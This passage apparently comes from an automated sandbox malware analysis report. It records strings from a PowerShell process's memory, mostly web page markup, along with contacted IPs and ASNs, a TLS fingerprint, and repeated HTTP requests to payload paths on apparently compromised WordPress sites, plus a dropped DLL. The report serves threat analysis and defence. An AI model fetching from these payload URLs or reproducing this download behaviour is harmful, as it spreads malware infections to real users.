src='data:image/svg+xml,%3Csvg%20xmlns=%22http://www.w3.org/2000/svg%22%20viewBox=%220%200%20210%20140%22%3E%3C/svg%3E' data-src="https://trasix.com/wp-content/themes/trasix/images/error-line.svg" alt="" class="lazyload contact-line"></section><div class="gradient-container"><footer class="footer"><div class="container"><div class="footer__left"><div> <a href="/"> <noscript><img src="https://trasix.com/wp-content/themes/trasix/images/logo.svg" alt="" class="footer__logo"></noscript><img src='data:image/svg+xml,%3Csvg%20xmlns=%22http://www.w3.org/2000/svg%22%20viewBox=%220%200%20210%20140%22%3E%3C/svg%3E' data-src="https://trasix.com/wp-content/themes/trasix/images/logo.svg" alt="" class="lazyload footer__logo"> </a> <span class="footer__copyright">Copyright
Source: powershell.exe, 00000005.00000002.477673890.0000000002ED7000.00000004.00000800.00020000.00000000.sdmp	String found in memory: 2024 Trasix</span></div><div><div class="footer__social"> <a href="https://www.linkedin.com/company/3836914" target="_blank" rel="noopener"> <svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M6.94 5.00002C6.93974 5.53046 6.72877 6.03906 6.35351 6.41394C5.97825 6.78883 5.46944 6.99929 4.939 6.99902C4.40857 6.99876 3.89997 6.78779 3.52508 6.41253C3.1502 6.03727 2.93974 5.52846 2.94 4.99802C2.94027 4.46759 3.15124 3.95899 3.5265 3.5841C3.90176 3.20922 4.41057 2.99876 4.941 2.99902C5.47144 2.99929 5.98004 3.21026 6.35492 3.58552C6.72981 3.96078 6.94027 4.46959 6.94 5.00002ZM7 8.48002H3V21H7V8.48002ZM13.32 8.48002H9.34V21H13.28V14.43C13.28 10.77 18.05 10.43 18.05 14.43V21H22V13.07C22 6.90002 14.94 7.13002 13.28 10.16L13.32 8.48002Z" fill="#333333"></path> </svg> </a> <a href="https://twitter.com/TrasixME" target="_blank" rel="noopener"> <svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M22.162 5.65593C21.3986 5.99362 20.589 6.2154 19.76 6.31393C20.6337 5.79136 21.2877 4.96894 21.6 3.99993C20.78 4.48793 19.881 4.82993 18.944 5.01493C18.3146 4.34151 17.4804 3.89489 16.5709 3.74451C15.6615 3.59413 14.7279 3.74842 13.9153 4.18338C13.1026 4.61834 12.4564 5.30961 12.0771 6.14972C11.6978 6.98983 11.6067 7.93171 11.818 8.82893C10.1551 8.74558 8.52832 8.31345 7.04328 7.56059C5.55823 6.80773 4.24812 5.75097 3.19799 4.45893C2.82628 5.09738 2.63095 5.82315 2.63199 6.56193C2.63199 8.01193 3.36999 9.29293 4.49199 10.0429C3.828 10.022 3.17862 9.84271 2.59799 9.51993V9.57193C2.59819 10.5376 2.93236 11.4735 3.54384 12.221C4.15532 12.9684 5.00647 13.4814 5.95299 13.6729C5.33661 13.84 4.6903 13.8646 4.06299 13.7449C4.32986 14.5762 4.85 15.3031 5.55058 15.824C6.25117 16.3449 7.09712 16.6337 7.96999 16.6499C7.10247 17.3313 6.10917 17.8349 5.04687 18.1321C3.98458 18.4293 2.87412 18.5142 1.77899 18.3819C3.69069 19.6114 5.91609 20.264 8.18899 20.2619C15.882 20.2619 20.089 13.8889 20.089 8.36193C20.089 8.18193 20.084 7.99993 20.076 7.82193C20.8949 7.23009 21.6016 6.49695 22.163 5.65693L22.162 5.65593Z" fill="#333333"></path> </svg> </a> <a href="https://www.facebook.com/TrasixME/" target="_blank" rel="noopener"> <svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M17 9.1436H13.4025V7.35836C13.4025 7.35836 13.201 5.66065 14.367 5.66065C15.6847 5.66065 16.7369 5.66065 16.7369 5.66065V2H12.7019C12.7019 2 9.32529 1.9854 9.32529 5.43747C9.32529 6.17903 9.32193 7.52913 9.31685 9.1436H7V12.091H9.31091C9.29742 16.7772 9.2814 22 9.2814 22H13.4025V12.091H16.1223L17 9.1436Z" fill="#333333"></path> </svg> </a></div><div class="footer__policy"> <a href="https://trasix.com/privacy-policy/">Privacy policy</a> <a href="https://trasix.com/terms/">Terms</a></div></div></div><div class="footer__right"><h2 class="footer__title">We collaborate with ambitious brands and people. Let
Source: powershell.exe, 00000005.00000002.477673890.0000000002ED7000.00000004.00000800.00020000.00000000.sdmp	String found in memory: })</script> <script src="https://trasix.com/wp-content/themes/trasix/js/wow.min.js"></script> <script>new WOW().init();</script> <script src="https://trasix.com/wp-content/themes/trasix/js/parallax.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/gsap/2.0.1/TweenMax.min.js"></script> <script src="https://trasix.com/wp-content/themes/trasix/js/clickEvent.js"></script> <script src="https://trasix.com/wp-content/themes/trasix/js/script.js"></script> </body></html>
Source: powershell.exe, 00000005.00000002.477673890.0000000002ED7000.00000004.00000800.00020000.00000000.sdmp	String found in memory: bE
Source: powershell.exe, 00000005.00000002.477673890.0000000003496000.00000004.00000800.00020000.00000000.sdmp	String found in memory: id":"https://anugerahmasinternasional.co.id/#/schema/logo/image/","u
Source: powershell.exe, 00000009.00000002.511859762.0000000002C00000.00000004.00000800.00020000.00000000.sdmp	String found in memory: })</script> <script src="https://trasix.com/wp-content/themes/trasix/js/wow.min.js"></script> <script>new WOW().init();</script> <script src="https://trasix.com/wp-content/themes/trasix/js/parallax.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/gsap/2.0.1/TweenMax.min.js"></script> <script src="https://trasix.com/wp-content/themes/trasix/js/clickEvent.js"></script> <script src="http
Source: powershell.exe, 00000009.00000002.511859762.0000000002C00000.00000004.00000800.00020000.00000000.sdmp	String found in memory: })</script> <script src="https://trasix.com/wp-content/themes/trasix/js/wow.min.js"></script> <script>new WOW().init();</script> <script src="https://trasix.com/wp-content/themes/trasix/js/parallax.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/gsap/2.0.1/TweenMax.min.js"></script> <script src="https://trasix.com/wp-content/themes/trasix/js/clickEvent.js"></script> <script src="httpp
Source: powershell.exe, 00000009.00000002.511859762.0000000002C00000.00000004.00000800.00020000.00000000.sdmp	String found in memory: id":"https://trasix.com/#website","url":"https://trasix.com/","name":"Trasix","descript
Source: powershell.exe, 00000009.00000002.511859762.0000000002C00000.00000004.00000800.00020000.00000000.sdmp	String found in memory: !function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return e===r[t]})}function u(e,t,n){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\uddfa\ud83c\uddf3","\ud83c\uddfa\u200b\ud83c\uddf3")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);</script> <script src="//platform-api.sharethis.com/js/sharethis.js?ver=2.3.0#property=622b5f4ae5feeb001af
Source: powershell.exe, 00000009.00000002.511859762.0000000002C00000.00000004.00000800.00020000.00000000.sdmp	String found in memory: <!doctype html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><link rel="stylesheet" href="https://unpkg.com/swiper/swiper-bundle.min.css"><link rel="apple-touch-icon" sizes="180x180" href="/wp-content/themes/trasix/images/favicon/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/wp-content/themes/trasix/images/favicon/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/wp-content/themes/trasix/images/favicon/favicon-16x16.png"><link rel="manifest" href="/wp-content/themes/trasix/images/favicon/site.webmanifest"><link rel="mask-icon" href="/wp-content/themes/trasix/images/favicon/safari-pinned-tab.svg" color="#d81b42"><link rel="shortcut icon" href="/wp-content/themes/trasix/images/favicon/favicon.ico"><meta name="msapplication-TileColor" content="#ffffff"><meta name="msapplication-config" content="/wp-content/themes/trasix/images/favicon/browserconfig.xml"><meta name="theme-color" content="#ffffff"><link rel="preload" as="font" href="/wp-content/themes/trasix/font/Poppins/Poppins-Light.ttf" type="font/ttf" crossorigin><link rel="preload" as="font" href="/wp-content/themes/trasix/font/Poppins/Poppins-Bold.ttf" type="font/ttf" crossorigin><link rel="preload" as="font" href="/wp-content/themes/trasix/font/Poppins/Poppins-SemiBold.ttf" type="font/ttf" crossorigin><meta name='robots' content='noindex, follow' /><link media="all" href="https://trasix.com/wp-content/cache/autoptimize/css/autoptimize_b84897168bbb31e8d1c0e99da21478a7.css" rel="stylesheet"><title>Page not found - Trasix</title><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found - Trasix" /><meta property="og:site_name" content="Trasix" /> <script type="application/ld+json" class="yoast-schema-graph">{"
Source: powershell.exe, 00000009.00000002.511859762.0000000002C00000.00000004.00000800.00020000.00000000.sdmp	String found in memory:
Source: powershell.exe, 00000009.00000002.511859762.0000000002BFC000.00000004.00000800.00020000.00000000.sdmp	String found in memory: s build something great together!</h2><div class="footer__menu"><nav><ul><li class="footer__menu-title">Modules</li><li id="menu-item-44" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-44"><a href="https://trasix.com/modules/line-planning/">Line planning</a></li><li id="menu-item-42" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-42"><a href="https://trasix.com/modules/merchandizing/">Merchandizing</a></li><li id="menu-item-43" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-43"><a href="https://trasix.com/modules/digital-catalog/">Digital catalog</a></li><li id="menu-item-41" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-41"><a href="https://trasix.com/modules/digital-showroom-and-3d-sample-virtualization/">Digital showroom and sample virtualization</a></li><li id="menu-item-40" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-40"><a href="https://trasix.com/modules/orders-collection-and-management/">Order collection & management</a></li></ul><ul><li class="footer__menu-title">Partner</li><li id="menu-item-45" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-45"><a href="https://trasix.com/become-a-partner/">Become a partner</a></li><li id="menu-item-46" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-46"><a href="https://trasix.com/integrations/">Integrations</a></li></ul><ul><li class="footer__menu-title">Company</li><li id="menu-item-49" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-49"><a href="https://trasix.com/our-story/">Our story</a></li><li id="menu-item-826" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-826"><a href="https://trasix.com/blog/">Blog</a></li><li id="menu-item-48" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-48"><a href="https://trasix.com/contacts/">Contacts</a></li><li id="menu-item-47" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-47"><a href="https://trasix.com/careers/">Careers</a></li></ul></nav></div></div></div></footer> <noscript><img src="https://trasix.com/wp-content/themes/trasix/images/abstract.png" alt="" class="gradient-container__bg"></noscript><img src='data:image/svg+xml,%3Csvg%20xmlns=%22http://www.w3.org/2000/svg%22%20viewBox=%220%200%20210%20140%22%3E%3C/svg%3E' data-src="https://trasix.com/wp-content/themes/trasix/images/abstract.png" alt="" class="lazyload gradient-container__bg"></div><div class="loader"><div class="loader-container"> <noscript><img src="/wp-content/themes/trasix/images/logo.svg"></noscript><img class="lazyload" src='data:image/svg+xml,%3Csvg%20xmlns=%22http://www.w3.org/2000/svg%22%20viewBox=%220%200%20210%20140%22%3E%3C/svg%3E' data-src="/wp-content/themes/trasix/images/logo.svg"></div></div> <noscript><style>.lazyload{display:none;}</style></noscript><script data-noptimize="1">windo
Source: powershell.exe, 00000009.00000002.511859762.0000000002802000.00000004.00000800.00020000.00000000.sdmp	String found in memory: })</script> <script src="https://trasix.com/wp-content/themes/trasix/js/wow.min.js"></script> <script>new WOW().init();</script> <script src="https://trasix.com/wp-content/themes/trasix/js/parallax.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/gsap/2.0.1/TweenMax.min.js"></script> <script src="https://trasix.com/wp-content/themes/trasix/js/clickEvent.js"></script> <script src="https://trasix.com/wp-content/themes/trasix/js/script.js"></script> </body></html>8
Source: powershell.exe, 00000009.00000002.511859762.0000000002A45000.00000004.00000800.00020000.00000000.sdmp	String found in memory: <img loading="lazy" decoding="async" width="1024" height="315" src="https://datasits.com/wp-content/uploads/2023/02/Team-Work-1-1024x315.png" class="attachment-large size-large wp-image-3747" alt="" srcset="https://datasits.com/wp-content/uploads/2023/02/Team-Work-1-1024x315.png 1024w, https://datasits.com/wp-content/uploads/2023/02/Team-Work-1-300x92.png 300w, https://datasits.com/wp-content/uploads/2023/02/Team-Work-1-768x236.png 768w, https://datasits.com/wp-content/uploads/2023/02/Team-Work-1.png 1300w" sizes="(max-width: 1024px) 100vw, 1024px" /></div>

Source: Joe Sandbox View	IP Address: 63.250.43.9 63.250.43.9
Source: Joe Sandbox View	IP Address: 63.250.43.10 63.250.43.10

Source: Joe Sandbox View	ASN Name: MERLIN-TELECOMUA MERLIN-TELECOMUA
Source: Joe Sandbox View	ASN Name: EKSENBILISIMTR EKSENBILISIMTR
Source: Joe Sandbox View	ASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS

Source: Joe Sandbox View

JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d

Source: global traffic	HTTP traffic detected: GET /wp-admin/y5Aa1jt0Sp2Qk/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005Host: trasix.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /abc/Y6Y0fTbUEg6/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005Host: www.parkinsons.co.inConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-admin/y5Aa1jt0Sp2Qk/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005Host: trasix.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /abc/Y6Y0fTbUEg6/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005Host: www.parkinsons.co.inConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/NR/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005Host: pardiskood.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-includes/63De/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005Host: daujimaharajmandir.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-admin/SJbxE5I/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005Host: anugerahmasinternasional.co.idConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Fox-C404/mDHkfgebMRzmGKBy/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005Host: anwaralbasateen.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/NR/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005Host: pardiskood.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-includes/63De/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005Host: daujimaharajmandir.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-includes/Zkj4QO/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005Host: datasits.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-admin/BlkdOKDXL/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005Host: actividades.laforetlanguages.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-admin/BlkdOKDXL/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005Host: actividades.laforetlanguages.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-admin/BlkdOKDXL/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005Host: actividades.laforetlanguages.comConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 20.23.238.122:443 -> 192.168.2.22:49164 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 77.37.50.35:443 -> 192.168.2.22:49165 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 20.23.238.122:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 147.79.116.130:443 -> 192.168.2.22:49174 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49177 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 15.197.148.33:443 -> 192.168.2.22:49178 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.3.222:443 -> 192.168.2.22:49180 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 207.174.214.153:443 -> 192.168.2.22:49182 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49184 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.22:49185 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 63.250.43.9:443 -> 192.168.2.22:49186 version: TLS 1.0

Source: global traffic	HTTP traffic detected: GET /wp-admin/y5Aa1jt0Sp2Qk/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005Host: trasix.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /abc/Y6Y0fTbUEg6/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005Host: www.parkinsons.co.inConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-admin/y5Aa1jt0Sp2Qk/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005Host: trasix.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /abc/Y6Y0fTbUEg6/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005Host: www.parkinsons.co.inConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/NR/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005Host: pardiskood.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-includes/63De/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005Host: daujimaharajmandir.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-admin/SJbxE5I/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005Host: anugerahmasinternasional.co.idConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Fox-C404/mDHkfgebMRzmGKBy/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005Host: anwaralbasateen.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/NR/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005Host: pardiskood.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-includes/63De/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005Host: daujimaharajmandir.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-includes/Zkj4QO/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005Host: datasits.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-admin/BlkdOKDXL/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005Host: actividades.laforetlanguages.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-admin/BlkdOKDXL/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005Host: actividades.laforetlanguages.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-admin/BlkdOKDXL/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005Host: actividades.laforetlanguages.comConnection: Keep-Alive

Source: vbkwk.dll.5.dr	String found in binary or memory: <a class="elementor-icon elementor-social-icon elementor-social-icon-facebook elementor-repeater-item-8f71d56" href="https://www.facebook.com/data.square.for.it.solutions" target="_blank"> equals www.facebook.com (Facebook)
Source: vbkwk.dll.5.dr	String found in binary or memory: <a class="elementor-icon elementor-social-icon elementor-social-icon-linkedin elementor-repeater-item-bb3b784" href="https://www.linkedin.com/in/data-square-for-it-solutions-b5717521b/" target="_blank"> equals www.linkedin.com (Linkedin)
Source: vbkwk.dll.5.dr	String found in binary or memory: <a class="elementor-icon elementor-social-icon elementor-social-icon-youtube elementor-repeater-item-74ccd96" href="https://www.youtube.com/channel/UC9R4Hdjnt08LnJ1TBl6mXlw" target="_blank"> equals www.youtube.com (Youtube)
Source: powershell.exe, 00000005.00000002.477673890.0000000002ED7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 2024 Trasix</span></div><div><div class="footer__social"> <a href="https://www.linkedin.com/company/3836914" target="_blank" rel="noopener"> <svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M6.94 5.00002C6.93974 5.53046 6.72877 6.03906 6.35351 6.41394C5.97825 6.78883 5.46944 6.99929 4.939 6.99902C4.40857 6.99876 3.89997 6.78779 3.52508 6.41253C3.1502 6.03727 2.93974 5.52846 2.94 4.99802C2.94027 4.46759 3.15124 3.95899 3.5265 3.5841C3.90176 3.20922 4.41057 2.99876 4.941 2.99902C5.47144 2.99929 5.98004 3.21026 6.35492 3.58552C6.72981 3.96078 6.94027 4.46959 6.94 5.00002ZM7 8.48002H3V21H7V8.48002ZM13.32 8.48002H9.34V21H13.28V14.43C13.28 10.77 18.05 10.43 18.05 14.43V21H22V13.07C22 6.90002 14.94 7.13002 13.28 10.16L13.32 8.48002Z" fill="#333333"></path> </svg> </a> <a href="https://twitter.com/TrasixME" target="_blank" rel="noopener"> <svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M22.162 5.65593C21.3986 5.99362 20.589 6.2154 19.76 6.31393C20.6337 5.79136 21.2877 4.96894 21.6 3.99993C20.78 4.48793 19.881 4.82993 18.944 5.01493C18.3146 4.34151 17.4804 3.89489 16.5709 3.74451C15.6615 3.59413 14.7279 3.74842 13.9153 4.18338C13.1026 4.61834 12.4564 5.30961 12.0771 6.14972C11.6978 6.98983 11.6067 7.93171 11.818 8.82893C10.1551 8.74558 8.52832 8.31345 7.04328 7.56059C5.55823 6.80773 4.24812 5.75097 3.19799 4.45893C2.82628 5.09738 2.63095 5.82315 2.63199 6.56193C2.63199 8.01193 3.36999 9.29293 4.49199 10.0429C3.828 10.022 3.17862 9.84271 2.59799 9.51993V9.57193C2.59819 10.5376 2.93236 11.4735 3.54384 12.221C4.15532 12.9684 5.00647 13.4814 5.95299 13.6729C5.33661 13.84 4.6903 13.8646 4.06299 13.7449C4.32986 14.5762 4.85 15.3031 5.55058 15.824C6.25117 16.3449 7.09712 16.6337 7.96999 16.6499C7.10247 17.3313 6.10917 17.8349 5.04687 18.1321C3.98458 18.4293 2.87412 18.5142 1.77899 18.3819C3.69069 19.6114 5.91609 20.264 8.18899 20.2619C15.882 20.2619 20.089 13.8889 20.089 8.36193C20.089 8.18193 20.084 7.99993 20.076 7.82193C20.8949 7.23009 21.6016 6.49695 22.163 5.65693L22.162 5.65593Z" fill="#333333"></path> </svg> </a> <a href="https://www.facebook.com/TrasixME/" target="_blank" rel="noopener"> <svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M17 9.1436H13.4025V7.35836C13.4025 7.35836 13.201 5.66065 14.367 5.66065C15.6847 5.66065 16.7369 5.66065 16.7369 5.66065V2H12.7019C12.7019 2 9.32529 1.9854 9.32529 5.43747C9.32529 6.17903 9.32193 7.52913 9.31685 9.1436H7V12.091H9.31091C9.29742 16.7772 9.2814 22 9.2814 22H13.4025V12.091H16.1223L17 9.1436Z" fill="#333333"></path> </svg> </a></div><div class="footer__policy"> <a href="https://trasix.com/privacy-policy/">Privacy policy</a> <a href="https://trasix.com/terms/">Terms</a></div></div></div><div class="footer__right"><h2 class="footer__title">We collaborate with ambitious brands and people. Let equals www.facebook.com (Facebook)
Source: powershell.exe, 00000005.00000002.477673890.0000000002ED7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 2024 Trasix</span></div><div><div class="footer__social"> <a href="https://www.linkedin.com/company/3836914" target="_blank" rel="noopener"> <svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M6.94 5.00002C6.93974 5.53046 6.72877 6.03906 6.35351 6.41394C5.97825 6.78883 5.46944 6.99929 4.939 6.99902C4.40857 6.99876 3.89997 6.78779 3.52508 6.41253C3.1502 6.03727 2.93974 5.52846 2.94 4.99802C2.94027 4.46759 3.15124 3.95899 3.5265 3.5841C3.90176 3.20922 4.41057 2.99876 4.941 2.99902C5.47144 2.99929 5.98004 3.21026 6.35492 3.58552C6.72981 3.96078 6.94027 4.46959 6.94 5.00002ZM7 8.48002H3V21H7V8.48002ZM13.32 8.48002H9.34V21H13.28V14.43C13.28 10.77 18.05 10.43 18.05 14.43V21H22V13.07C22 6.90002 14.94 7.13002 